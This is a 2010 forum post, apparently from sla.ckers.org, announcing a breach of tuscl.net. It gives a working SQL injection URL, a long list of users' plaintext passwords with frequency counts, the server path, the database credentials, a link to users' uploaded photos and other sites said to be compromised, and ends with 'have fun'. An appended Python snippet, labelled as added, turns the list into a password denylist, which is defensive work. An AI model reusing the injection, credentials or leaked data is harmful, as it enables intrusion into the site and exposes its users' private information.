Sla.ckers.org
TUSCL.net SQL injection 20k Plain Text Pass & 80K Emails
Posted by: tuscl
Date: September 04, 2010 08:53AM

I found many sql injections on Tuscl.net (The ultimate strip club list)

I tried notifying the site, no response. The server is run on VMware, so
anything that is done to it is restored upon reboot.

This is a dump of usernames, passwords and emails for the site. They are in
plain text. I have removed records that had the system-generated password
that the user never changed.


http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

Common Passwords and the number of accounts that shared them

password - 269
123456 - 173
tuscl - 84
stripper - 67
qwerty - 62
12345 - 49
12345678 - 47
1234 - 42
baseball - 36
monkey - 36
princess - 34
stripclub - 33
strip - 32
jennifer - 32
abc123 - 32
mustang - 31
pussy - 29
lapdance - 27
andrew - 27
jmh1978 - 27
letmein - 27
fuckyou - 27
696969 - 27
michelle - 26
harley - 25
dallas - 25
111111 - 25
shadow - 24
corvette - 24
trustno1 - 24
sunshine - 22
dragon - 21
jordan - 21
love - 21
butthead - 20
batman - 20
danielle - 20
buster - 20
password1 - 20
hello - 20
biteme - 20
gaydar - 20
Michael - 19
george - 19
hockey - 19
ginger - 19
6969 - 19
Bandit - 19
lasvegas - 18
taylor - 18
tigger - 18
yankees - 18
chicago - 18
fucker - 18
blahblah - 17
football - 17
1escobar2 - 17
1111 - 17
Jessica - 17
123456789 - 16
testing - 16
phoenix - 16
badboy - 16
gemini - 16
ranger - 16
heather - 15
gateway - 15
secret - 15
welcome - 15
654321 - 15
aaaaaa - 15
tennis - 15
asshole - 15
maggie - 14
pepper - 14
charlie - 14
golfer - 14
strippers - 14
redskins - 14
summer - 14
peanut - 14
chicken - 13
jeremy - 13
hunter - 13
m0ntlure - 13
fuckoff - 13
dancer - 13
bitch - 13
lucky - 13
whatever - 13
killer - 13
prince - 13
robert - 13
orange - 13
thomas - 13
hawaii - 12
redsox - 12
tiger - 12
titties - 12
gators - 12
florida - 12
kitten - 12
austin - 12
merlin - 12
canada - 12
diamond - 12
boston - 12
master - 12
yellow - 12
falcon - 12
jasmine - 12
1234567 - 12
cookie - 12
superman - 12
midnight - 12
blowme - 12
jackass - 12
sparky - 12
peekaboo - 11
doctor - 11
brandy - 11
8675309 - 11
madison - 11
braves - 11
brooklyn - 11
money - 11
anthony - 11
samantha - 11
ashley - 11
lucky1 - 11
amanda - 11
booboo - 11
SOCCER - 11
tarheels - 11
bigdog - 11
pookie - 11
private - 11
tiffany - 11
martin - 11
silver - 11
lakers - 10
eatme - 10
junior - 10
platinum - 10
sex - 10
iloveyou - 10
nicole - 10
vegas - 10
wolfpack - 10
55555555 - 10
barney - 10
melissa - 10
molly - 10
passw0rd - 10
sexy - 10
nascar - 10
dietcoke - 10
chris - 10
boomer - 10
test123 - 10
johnny - 10
red123 - 10
asdfgh - 10
ncc1701 - 10
314159 - 10
internet - 10
jackson - 10
computer - 10
peaches - 10
horny - 10
sierra - 10
rush2112 - 10

Here is the complete list of email addresses registered. The site had no
validation, so I am sure some are fake.

The path to the working directory is: /home/httpd/vhosts/tuscl.net/httpdocs/

The SQL information is
"localhost" - "tuscl" - "szg4wpl9"

Also if you want to look at all the nudey photos uploaded here is where they
are
http://www.tuscl.net/pictures/

There are other sites that could have been compromised as well:
vanjonesthinksimanasshole.com
tuscl.com
onerun.com
ecampguide.com (contains another 1200 plain text passwords)
troopedge.com

Well have fun!
Owner or media, if you want to get ahold of me:
auto595158@hushmail com
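The frequency list above is the kind of data a defender can turn into a password denylist. The following is an added example, not code from the original post: it parses "password - count" lines (skipping stray header rows such as "Password - cnt"), measures how many accounts share the top-N passwords, and applies a breach-derived denylist check of the sort a registration form should enforce. The sample input is constructed (its first rows mirror the post's list, the 20,000-account total is taken from the post title).

```python
# Added example (not from the original post): turn a breach frequency list
# into a registration-time denylist check.
import re
from collections import Counter

# Constructed sample in the post's "password - count" format. The stray
# "Password - cnt" row mimics the SQL header residue seen in the post.
SAMPLE = """\
password - 269
123456 - 173
tuscl - 84
stripper - 67
qwerty - 62
Password - cnt
12345 - 49
"""

TOTAL_ACCOUNTS = 20000  # assumption: the "20k" figure from the post title

LINE_RE = re.compile(r"^(?P<pw>.+?) - (?P<n>\d+)$")


def parse_counts(text: str) -> Counter:
    """Parse 'password - count' lines; rows whose count is not numeric are skipped."""
    counts: Counter = Counter()
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            counts[m["pw"]] += int(m["n"])
    return counts


def top_coverage(counts: Counter, total_accounts: int, n: int) -> float:
    """Fraction of all accounts that share one of the n most common passwords."""
    shared = sum(c for _, c in counts.most_common(n))
    return shared / total_accounts


def build_denylist(counts: Counter, min_count: int = 2) -> set:
    """Case-folded set of passwords reused by at least min_count accounts."""
    return {pw.casefold() for pw, c in counts.items() if c >= min_count}


def is_allowed(candidate: str, denylist: set, min_len: int = 8) -> bool:
    """Reject short passwords and anything on the denylist, case-insensitively."""
    return len(candidate) >= min_len and candidate.casefold() not in denylist


if __name__ == "__main__":
    counts = parse_counts(SAMPLE)
    print(f"top-2 coverage: {top_coverage(counts, TOTAL_ACCOUNTS, 2):.2%}")
    print("PASSWORD allowed?", is_allowed("PASSWORD", build_denylist(counts)))
```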
